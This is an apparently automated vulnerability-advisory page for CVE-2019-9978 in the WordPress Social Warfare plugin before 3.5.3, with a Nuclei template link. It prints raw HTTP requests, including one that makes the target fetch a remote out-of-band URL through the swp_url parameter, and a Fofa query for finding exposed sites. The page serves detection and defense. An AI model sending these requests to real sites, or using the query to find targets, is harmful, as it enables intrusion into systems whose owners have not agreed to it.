🔙 목록으로 돌아가기

CVE-2019-9978: WordPress Social Warfare <3.5.3 - Cross-Site Scripting

TitleWordPress Social Warfare <3.5.3 - Cross-Site Scripting
Authormadrobot,dwisiswant0
SeverityMedium
ImpactAttackers can execute arbitrary scripts in admin context, potentially leading to session hijacking or privilege escalation.
RemediationUpdate to version 3.5.3 or later.
CVSS Score6.1
EPSS Score0.87417
CVE IDCVE-2019-9978
CWE IDCWE-79
Fofa Querybody="social-warfare" && body="wp-"
Tags cve cve2019 wordpress wp-plugin ssrf kev warfareplugins xss vkev vuln

🔍 Vulnerability Description

WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.

🌐 HTTP Request

GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Accept-Encoding: gzip
GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://d5jpm5ple0o4rj70qh80m5rerp18se3ye.oast.online HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9978.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9978.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A